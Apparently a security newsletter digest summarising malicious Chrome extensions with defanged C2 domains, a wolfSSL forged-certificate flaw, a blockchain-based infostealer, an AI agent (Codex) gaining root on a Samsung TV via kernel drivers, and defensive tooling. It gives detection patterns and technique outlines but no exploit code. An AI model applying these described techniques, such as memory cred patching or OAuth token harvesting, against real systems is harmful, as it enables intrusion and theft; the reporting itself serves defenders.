Attacks & Vulnerabilities
|
108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure (7 minute read)
Socket's Threat Research Team identified 108 malicious Chrome extensions across ~20k installs operating as a coordinated MaaS campaign under shared C2 infrastructure at cloudapi[.]stream, with 54 extensions harvesting Google OAuth2 identity via chrome.identity.getAuthToken, one actively exfiltrating Telegram Web sessions every 15 seconds, and 45 containing a universal loadInfo() backdoor that opens operator-specified URLs on every browser start. All five publisher identities trace back to just two Google Cloud project numbers, and the C2 backend runs a Strapi CMS with a payment portal, confirming the identities are sold as a service. Defenders should block cloudapi[.]stream and top[.]rodeo at the network perimeter, scan extension bundles for the user_info/infoURL/chrome.tabs.create pattern, and flag any extension combining the identity permission with declarativeNetRequest rules that strip CSP headers.
|
Critical flaw in wolfSSL library enables forged certificate use (2 minute read)
CVE-2026-5194 (critical) in wolfSSL allows attackers to submit forged certificates with undersized digests that pass ECDSA, DSA, ML-DSA, Ed25519, and Ed448 signature verification due to missing hash/digest size and OID checks, affecting over 5 billion devices and applications. The flaw was patched in wolfSSL 5.9.1 (April 8). Teams running vendor firmware or distro-packaged builds should await downstream advisories rather than assuming coverage from the upstream fix.
|
Nightclub Giant RCI Hospitality Reports Data Breach (2 minute read)
RCI Hospitality found on March 23 that an Insecure Direct Object Reference (IDOR) bug in an IIS server at RCI Internet Services exposed data for numerous independent contractors, starting March 19. Attackers accessed names, dates of birth, contact details, Social Security numbers, and driver's license numbers, but not customer or financial systems.
|
|
Omnistealer uses the blockchain to steal everything it can (2 minute read)
Omnistealer is a new infostealer that embeds encrypted staging code directly into transactions on TRON, Aptos, and Binance Smart Chain, exploiting the append-only nature of public ledgers to create a C2 infrastructure that defenders cannot take down. Delivered via fake LinkedIn/Upwork freelance job offers pointing to trojanized GitHub repositories, the malware targets over 10 password managers, 60+ browser-based crypto wallets, major browsers, and cloud storage credentials, with researchers estimating roughly 300,000 compromised credentials spanning financial firms, defense suppliers, and US government entities. Organizations should enforce sandbox policies for evaluating third-party code, block execution from user-writable directories, and monitor for outbound connections to blockchain RPC endpoints as an emerging C2 channel.
|
Codex Hacked a Samsung TV (8 minute read)
Researchers gave OpenAI Codex a shell inside a Samsung TV browser process, plus matching KantS2 firmware source and a controlled toolchain. Codex audited exposed Novatek ntk* kernel drivers, used /dev/ntksys as a physmap primitive validated via /dev/ntkhdma, reconstructed RAM ranges from boot args, and then located and patched cred structures in physical memory to turn the browser context into a root shell on the live TV.
|
|
Running AI agents with customized templates using Docker sandbox (5 minute read)
Andrew Lock extends the sbx Docker sandbox tool by showing how to bake pre-installed toolchains into custom OCI images, eliminating per-session reinstalls and keeping AI agents isolated in microVMs with scoped filesystem access and a network proxy that injects credentials without exposing them to the agent. For teams needing a non-standard base image, Lock reverse-engineered the docker/sandbox-templates layer structure to transplant sandbox scaffolding onto an arbitrary distro, demonstrated with a Debian image matching the Datadog .NET SDK build environment. Isolating the Claude Code install in its own multi-stage build stage enables rapid version updates via --no-cache-filter without rebuilding the full image.
|
Supply Chain Monitor (GitHub Repo)
Elastic's supply-chain-monitor polls PyPI's XML-RPC changelog feed and npm's CouchDB replication stream for new releases across up to 15,000 top packages per ecosystem, diffs each release against its predecessor, and routes the unified diff to Cursor Agent CLI for LLM-based malicious/benign classification, with Slack alerting on positive findings. Detection targets include obfuscated code, unexpected network calls, persistence writes, credential exfiltration, and typosquatting indicators. The tool validated against real-world attacks including the Telnyx PyPI compromise and the axios npm supply chain incident.
|
PySentry (GitHub Repo)
PySentry is a Rust-based Python dependency vulnerability scanner that parses uv.lock, Poetry, Pipfile, pyproject.toml, and requirements.txt formats, cross-referencing findings against PyPA Advisory Database, PyPI JSON API, and OSV.dev. It supports PEP 792 detection of archived, deprecated, and quarantined packages, with SARIF/JSON/Markdown output and a --forbid-quarantined flag for blocking malware-flagged packages in CI pipelines.
|
|
Bringing Rust to the Pixel Baseband (6 minute read)
Google is moving the Pixel 10 modem's DNS parser from C/C++ to Rust to cut memory-safety bugs in a high‑risk, remotely reachable component. The team selected the hickory-proto DNS crate, added no_std support, and integrated it via Pigweed and direct rustc builds, solving code size, allocator, panic, and symbol conflicts. The Rust parser now drives DNS responses while reusing existing C data structures and callbacks.
|
How Often Do Threat Actors Default On Promises to Delete Data? (3 minute read)
DataBreaches surveyed incident response firms and the broader infosec community on LinkedIn to assess whether ransomware groups honor data deletion commitments after payment. Respondents reported rarely encountering repeat extortion or confirmed data retention by the same group, suggesting most honor the transactional nature of the arrangement. One notable exception involved a client whose data was deleted from the primary attacker-controlled infrastructure but persisted on exfiltration intermediaries that the threat actor had not scrubbed.
|
|
OpenSSL 4.0.0 released (1 minute read)
OpenSSL 4.0.0 ships with Encrypted Client Hello (RFC 9849), ML-DSA-MU, post-quantum curveSM2MLKEM768, and negotiated FFDHE in TLS 1.2, while dropping SSLv2/SSLv3, engine support, deprecated EC curves, and fixed TLS version method functions.
|
|
Love TLDR? Tell your friends and get rewards! |
|
Share your referral link below with friends to get free TLDR swag!
|
|
|
|
| Track your referrals here. |
|
|
|
0 Comments